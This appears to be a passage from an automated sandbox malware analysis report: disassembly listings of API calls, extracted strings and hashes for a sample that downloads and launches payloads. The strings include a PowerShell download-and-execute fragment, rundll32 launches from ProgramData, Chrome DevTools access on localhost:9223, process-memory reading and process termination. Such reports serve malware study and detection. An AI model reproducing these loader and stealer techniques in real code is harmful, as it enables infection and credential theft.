                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 00404151
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,https), ref: 00404165
                                                                                                                                                                                                                                                                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404195
                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 004041C9
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,-00000064), ref: 004041EB
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,-00000064,-00000044,00000000), ref: 00404205
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000400), ref: 0040422A
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404231
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(-00000058), ref: 0040423A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                                                                  • String ID: https
                                                                                                                                                                                                                                                                                                  • API String ID: 2507841554-1056335270
                                                                                                                                                                                                                                                                                                  • Opcode ID: c147ca11e88c7ddc157469b44d7132012a04bd987f341dfb92f5734880947861
                                                                                                                                                                                                                                                                                                  • Instruction ID: e26aa42ddcce7a9dc6db16cb5d707b66fd772de428dd0f6f7d264c55934dbf87
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c147ca11e88c7ddc157469b44d7132012a04bd987f341dfb92f5734880947861
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9041E9719002199BDB10EFB0DD85BEE77B9EF84348F004029F901A7191DB78A98AC7E9
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004110B3
                                                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 004110BE
                                                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004110C9
                                                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 004110D4
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004110E0
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004110EE
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004110FA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %dx%d$DISPLAY
                                                                                                                                                                                                                                                                                                  • API String ID: 3940144428-3048177138
                                                                                                                                                                                                                                                                                                  • Opcode ID: d4f6bdf6a8727250401686cbb5283f498457eeb982ee794fddf6dc554df9ea02
                                                                                                                                                                                                                                                                                                  • Instruction ID: 594384e9460ea50e1c1a2799b2b5ef6833a83c8cc8fe28b05d57f5c36ffcb85d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4f6bdf6a8727250401686cbb5283f498457eeb982ee794fddf6dc554df9ea02
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05F090713807047FF31027A5AC4EF2B7A5DEB84B56F110026BF06D72D2DAA56C1086F8
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404EA0: InternetOpenA.WININET(?,?,?,?,00002407), ref: 00404ECB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404EA0: memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00404FDC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404EA0: memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00405045
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00002407), ref: 00406F38
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004053F0: strlen.MSVCRT ref: 00405409
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004053F0: memchr.MSVCRT ref: 00405456
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004053F0: memcmp.MSVCRT(00000000,?,00000000), ref: 0040546E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040ED20: memcpy.MSVCRT(00000000,?,0000000F,00000000,-00000001,77355E70,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDD8
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00406C44
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000009,ws://localhost:9223,00000009,?,00002407), ref: 00406C58
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000009,00000000), ref: 00406C65
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy$lstrcat$??3@InternetOpenmemchrmemcmpmemmovememsetstrlen
                                                                                                                                                                                                                                                                                                  • String ID: /devtools$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                                                  • API String ID: 2141826376-2676143373
                                                                                                                                                                                                                                                                                                  • Opcode ID: d6df93589ec94bd32190cbd0c7d779cd049acc16d756cf596e2cae93c0837182
                                                                                                                                                                                                                                                                                                  • Instruction ID: 91c73b424bc1f2f560fb80e69d34ff2093765c111021dba20f9d1d410260af79
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6df93589ec94bd32190cbd0c7d779cd049acc16d756cf596e2cae93c0837182
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8731C9719002185BEB14AB65DC49BEFB775AF41308F41006EF506772C2DB7C1A85CBA9
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(?), ref: 00412560
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcatlstrlen$ExecuteShellSystemTimememset
                                                                                                                                                                                                                                                                                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$<$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                  • API String ID: 1675527290-38637897
                                                                                                                                                                                                                                                                                                  • Opcode ID: 04e0a849c7175668f7dfbabee4cdcea548fc796aeff486efc7e20cc012ef2f47
                                                                                                                                                                                                                                                                                                  • Instruction ID: 334dd5afd32dd1eb1b8252b2cfcba07153a0a01eb84f6ed827c6dd8a75e550bd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04e0a849c7175668f7dfbabee4cdcea548fc796aeff486efc7e20cc012ef2f47
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6418A303103146BD654BB6299A6BAF7A595BC4758F40045E784B1F283CEBC5CC5C7EE
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00411D72
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,000000FA), ref: 00411D80
                                                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00411D8F
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00411E21
                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00411E3C
                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00411E4B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process$Heap$AllocCloseHandleOpenTerminatewsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %hs
                                                                                                                                                                                                                                                                                                  • API String ID: 2756667156-2783943728
                                                                                                                                                                                                                                                                                                  • Opcode ID: bfd91a03897fc7cdf9307d1a4434efb42ed2110cc448090386432cb08c4c10e8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5d8af7fbd58c0c14971e09abe29c4d5a15048916ed38c030ba04a2c092a42a15
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfd91a03897fc7cdf9307d1a4434efb42ed2110cc448090386432cb08c4c10e8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E731C130608341ABD3109F60ED48BAFB7E9EFD5744F00591EF985821A0EB7499C4CA5B
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F9BC
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 0040F9DE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F890: strlen.MSVCRT ref: 0040F899
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F890: strlen.MSVCRT ref: 0040F8D6
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040F9FE
                                                                                                                                                                                                                                                                                                  • VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,00000000), ref: 0040FAA0
                                                                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00064000,00000000,?,?,00000000), ref: 0040FB5E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strlen$MemoryProcessQueryReadVirtualmemset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3741619940-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: c617cb530a7beb5f6651db65b09bd67427ed6a4aab75091136474a9db1aa80fd
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5f3e5458c0cb4e82bdfb47d3dacbfc32efe29669a25e4631f25e2303d30cacff
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c617cb530a7beb5f6651db65b09bd67427ed6a4aab75091136474a9db1aa80fd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0A159716083018BD328DF24D891A3BB7E2FF94704F14893EE58697791E738E849CB5A
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404100: InternetOpenA.WININET ref: 00404151
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404100: StrCmpCA.SHLWAPI(?,https), ref: 00404165
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404100: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404195
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404100: CreateFileA.KERNEL32 ref: 004041C9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404100: InternetReadFile.WININET(00000000,?,00000400,-00000064), ref: 004041EB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404100: WriteFile.KERNEL32(00000000,?,-00000064,-00000044,00000000), ref: 00404205
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404100: CloseHandle.KERNEL32(00000000,?,00000400), ref: 0040422A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404100: InternetCloseHandle.WININET(00000000), ref: 00404231
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404100: InternetCloseHandle.WININET(-00000058), ref: 0040423A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(?), ref: 00412374
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internetlstrcpy$CloseFileHandle$Openlstrcatlstrlen$CreateExecuteReadShellSystemTimeWritememset
                                                                                                                                                                                                                                                                                                  • String ID: "" $.dll$<$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                  • API String ID: 1030512983-3594953769
                                                                                                                                                                                                                                                                                                  • Opcode ID: 71bf46b4cf027e80f578f73df63c51bd86913535bd7139d30bb799e6920a5dfd
                                                                                                                                                                                                                                                                                                  • Instruction ID: 94f81c9545e4cc3746d51ce8cbcf5f5300d4dbcdb4f20de0f2bf9a4aeae790fb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71bf46b4cf027e80f578f73df63c51bd86913535bd7139d30bb799e6920a5dfd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87815170A0021857DB14FBB2CDEAAEF7B69AF44748F40145EB4066B182DEBC5DC5C7A8
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0041D5E3
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 0041D611
                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041D647
                                                                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D653
                                                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D66F
                                                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D6D8
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$File$PointerSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3240274019-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: bbcc28ab56e80f32c9f7ab3c82fd0820beba7326b7d26195747d188f513748ab
                                                                                                                                                                                                                                                                                                  • Instruction ID: 199ab82a49c152330d2498684869e6748a8235d6c4fc3d2a3f6766ec5b303acd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbcc28ab56e80f32c9f7ab3c82fd0820beba7326b7d26195747d188f513748ab
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8410EB1904705AED324CF25C845B7BBBE8FF84348F108A2EF5D69A291E774E486CB14
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,Version: ,0042150A,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 0041092D
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 0041093B
                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 00410942
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410971
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %d/%d/%d %d:%d:%d
                                                                                                                                                                                                                                                                                                  • API String ID: 1243822799-1073349071
                                                                                                                                                                                                                                                                                                  • Opcode ID: b2c1e16d8c03991da878c3dd388cb4621876e2a5b3eb0db676d70254b9559b3a
                                                                                                                                                                                                                                                                                                  • Instruction ID: a51e7d71a8269122c591f01167c988a4a4a74b4f43d1a07cc1a506d8f3a3d197
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2c1e16d8c03991da878c3dd388cb4621876e2a5b3eb0db676d70254b9559b3a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CF0E9619042207BE300175ADC49D3BB7ECEFC5B66F00450AF9C8861C0E2755C60C3F1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                  • memchr.MSVCRT ref: 0040F7F6
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,FFFFFFFF,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.,00000041,?,?,?,?,?,?,?,00000000), ref: 0040F870
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,FFFFFFFF,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.,00000041,?,?,?,?,?,?,?,00000000), ref: 0040F884
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_., xrefs: 0040F7A8
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ??3@_invalid_parameter_noinfo_noreturnmemchrmemmove
                                                                                                                                                                                                                                                                                                  • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.
                                                                                                                                                                                                                                                                                                  • API String ID: 1808541760-3714209346
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2e741561981e289a51148b6f99af6e0fc96081143b174a70ad3d1b80647f697e
                                                                                                                                                                                                                                                                                                  • Instruction ID: e5761b3670b8c8960a25c8c0341e9f71b1cf11a4bb1c116d5b70eba03c88b707
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e741561981e289a51148b6f99af6e0fc96081143b174a70ad3d1b80647f697e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9931E4326043014BD734EE28998476BB6E5EF81314F54493EF8926B7C2D378DC48879A
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strtok_s
                                                                                                                                                                                                                                                                                                  • String ID: |
                                                                                                                                                                                                                                                                                                  • API String ID: 3330995566-2343686810
                                                                                                                                                                                                                                                                                                  • Opcode ID: bc2c58b9c6c1bfbc32daa91625234a30c7c08b101eb4f4c09a5ba0343b8f98f7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7cbb43b9c3c311997e94ccc4c59da73614e136a49788afc63ea09a6e546b0ca8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc2c58b9c6c1bfbc32daa91625234a30c7c08b101eb4f4c09a5ba0343b8f98f7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F721D7741403099BD734DB21ED44BAB7365FB80308F04891ED91647741E77DE9AAC6A5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411ED0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411EE5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411ED0: Process32First.KERNEL32(00000000,?), ref: 00411EF1
